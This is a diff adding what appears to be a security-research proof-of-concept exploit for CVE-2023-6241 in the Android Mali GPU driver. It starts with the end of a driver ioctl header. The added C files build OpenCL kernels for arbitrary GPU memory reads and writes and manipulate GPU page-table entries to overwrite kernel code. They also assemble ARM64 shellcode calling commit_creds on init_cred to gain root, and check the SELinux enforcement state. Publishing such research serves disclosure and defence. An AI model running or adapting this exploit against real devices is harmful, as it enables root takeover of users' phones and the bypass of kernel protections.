__u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + 
_IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_cinstr_gwt_dump - Used to collect all GPU write fault + * addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + +/** + * struct kbase_ioctl_kinstr_prfcnt_enum_info - Enum Performance counter + * information + * @info_item_size: Performance counter item size in bytes. + * @info_item_count: Performance counter item count in the info_list_ptr. + * @info_list_ptr: Performance counter item list pointer which points to a + * list with info_item_count of items. + * + * On success: returns info_item_size and info_item_count if info_list_ptr is + * NULL, returns performance counter information if info_list_ptr is not NULL. + * On error: returns a negative error code. 
+ */ +struct kbase_ioctl_kinstr_prfcnt_enum_info { + __u32 info_item_size; + __u32 info_item_count; + __u64 info_list_ptr; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_ENUM_INFO \ + _IOWR(KBASE_IOCTL_TYPE, 56, struct kbase_ioctl_kinstr_prfcnt_enum_info) + +/** + * struct kbase_ioctl_kinstr_prfcnt_setup - Setup HWC dumper/reader + * @in: input parameters. + * @in.request_item_count: Number of requests in the requests array. + * @in.request_item_size: Size in bytes of each request in the requests array. + * @in.requests_ptr: Pointer to the requests array. + * @out: output parameters. + * @out.prfcnt_metadata_item_size: Size of each item in the metadata array for + * each sample. + * @out.prfcnt_mmap_size_bytes: Size in bytes that user-space should mmap + * for reading performance counter samples. + * + * A fd is returned from the ioctl if successful, or a negative value on error. + */ +union kbase_ioctl_kinstr_prfcnt_setup { + struct { + __u32 request_item_count; + __u32 request_item_size; + __u64 requests_ptr; + } in; + struct { + __u32 prfcnt_metadata_item_size; + __u32 prfcnt_mmap_size_bytes; + } out; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_SETUP \ + _IOWR(KBASE_IOCTL_TYPE, 57, union kbase_ioctl_kinstr_prfcnt_setup) + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/** + * struct kbase_ioctl_buffer_liveness_update - Update the live ranges of buffers from previous frame + * + * @live_ranges_address: Array of live ranges + * @live_ranges_count: Number of elements in the live ranges buffer + * @buffer_va_address: Array of buffer base virtual addresses + * @buffer_sizes_address: Array of buffer sizes + * @buffer_count: Number of buffers + * @padding: Unused + */ +struct kbase_ioctl_buffer_liveness_update { + __u64 live_ranges_address; + __u64 live_ranges_count; + __u64 buffer_va_address; + __u64 buffer_sizes_address; + __u64 buffer_count; +}; + +#define KBASE_IOCTL_BUFFER_LIVENESS_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 67, struct kbase_ioctl_buffer_liveness_update) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... 
+ * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define 
KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 +#ifdef __cpluscplus +} +#endif + +#endif /* _UAPI_KBASE_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c new file mode 100644 index 0000000..1774f0e --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c @@ -0,0 +1,265 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" + +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +static inline uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +static inline uint32_t hi32(uint64_t x) { + return x >> 32; +} + +static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +static uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + 
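+/*
+ * Note on the two helpers above: the GPU page tables targeted here have four
+ * levels with 512 entries each, so compute_pt_index() extracts the 9-bit index
+ * that a GPU VA uses at the given level, e.g. compute_pt_index(0x6000001000, 3)
+ * == (0x6000001 & 0x1ff) == 1. set_addr_lv3() keeps the upper bits of a GPU VA
+ * but forces its level-3 index to 0x100, i.e. it returns the address that is
+ * translated through entry OVERWRITE_INDEX (256) of the same bottom-level page
+ * table: write_func() writes through that entry and cleanup() later invalidates it.
+ */
+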
+struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64) { + int ret = 0; + + const char* source_str64 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned long *addr = (__global unsigned long*)(va[idx]);" + " addr[0] = in_out[idx];" + "} else {" + " __global unsigned long *addr = (__global unsigned long *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str32 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned int *addr = (__global unsigned int*)(va[idx]);" + " addr[0] = (unsigned int)(in_out[idx]);" + "} else {" + " __global unsigned int *addr = (__global unsigned int *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str = is64 ? source_str64 : source_str32; + + size_t source_size = strlen(source_str); + + cl_mem va = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create va buffer\n"); + } + cl_mem in_out = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create in_out buffer\n"); + } + cl_mem flag = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create flag buffer\n"); + } + + cl_program program = clCreateProgramWithSource(context, 1, (const char**)(&source_str), (const size_t*)(&source_size), &ret); + ret = clBuildProgram(program, 1, device_id, NULL, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to create program\n"); + } + + cl_kernel kernel = clCreateKernel(program, "rw_mem", &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create kernel %d\n", ret); + } + printf("kernel success\n"); + ret = clSetKernelArg(kernel, 0, sizeof(cl_mem), (void *)&va); + ret = clSetKernelArg(kernel, 1, sizeof(cl_mem), (void *)&in_out); + ret = clSetKernelArg(kernel, 2, sizeof(cl_mem), (void *)&flag); + if (ret != CL_SUCCESS) { + err(1, "Failed to set kernel arg\n"); + } + struct rw_mem_kernel out = {0}; + out.va = va; + out.in_out = in_out; + out.flag = flag; + out.kernel = kernel; + out.program = program; + return out; +} + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t write = 1; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Falied to flush queue in write_to\n"); + } + usleep(10000); +} + + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t 
reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + reserved_size * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + uint64_t this_addr = overwrite_addr + func_offset + code * 4; + uint64_t this_code = shellcode[code]; + write_to(mali_fd, &this_addr, &this_code, command_queue, kernel32); + } + usleep(300000); + } + } + } +} + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t read = 0; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &read, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + uint64_t out = 0; + if (clEnqueueReadBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), &out, 0, NULL, NULL) != CL_SUCCESS) { + err(1, "Failed to read result\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Falied to flush queue in write_to\n"); + } + usleep(10000); + return out; +} + +void releaseKernel(struct rw_mem_kernel* kernel) { + clReleaseKernel(kernel->kernel); + clReleaseProgram(kernel->program); + clReleaseMemObject(kernel->va); + clReleaseMemObject(kernel->in_out); + clReleaseMemObject(kernel->flag); + memset(kernel, 0, sizeof(struct rw_mem_kernel)); +} + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t addr = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + uint64_t invalid = 2; + write_to(mali_fd, &addr, &invalid, command_queue, kernel); +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h new file mode 100644 index 0000000..1906051 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h @@ -0,0 +1,41 @@ +#ifndef MEM_READ_WRITE_H +#define MEM_READ_WRITE_H + +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" + +#define KERNEL_BASE 0x80000000 + +#define PAGE_SHIFT 12 + +#define OVERWRITE_INDEX 256 + +struct rw_mem_kernel { + cl_mem va; + cl_mem in_out; + cl_mem flag; + cl_kernel kernel; + cl_program program; +}; + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group); + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, 
uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code); + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32); + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64); + +void releaseKernel(struct rw_mem_kernel* kernel); + +int run_enforce(); + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c new file mode 100644 index 0000000..c96b25c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c @@ -0,0 +1,60 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include + +#include "mempool_utils.h" + +#define POOL_SIZE 16384 + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed %d\n", i); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h new file mode 100644 index 0000000..9aa4caa --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h @@ -0,0 +1,20 @@ +#ifndef MEMPOOL_UTILS_H +#define MEMPOOL_UTILS_H + +#include +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "log_utils.h" + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc); + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +uint64_t drain_mem_pool(int mali_fd); + +void 
release_mem_pool(int mali_fd, uint64_t drain); + +#endif
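+
+/*
+ * Usage sketch (an interpretation of how the main exploit ties these helpers
+ * together, not part of the original header): reserve_pages() commits GPU
+ * regions without mapping them; drain_mem_pool() and release_mem_pool() then
+ * allocate and free a POOL_SIZE region to put the driver's page pools into a
+ * known state; the exploit next frees the page that its stale GPU mapping
+ * still points to, and map_reserved() maps the reserved regions so that the
+ * page tables allocated for them can reuse that freed page.
+ */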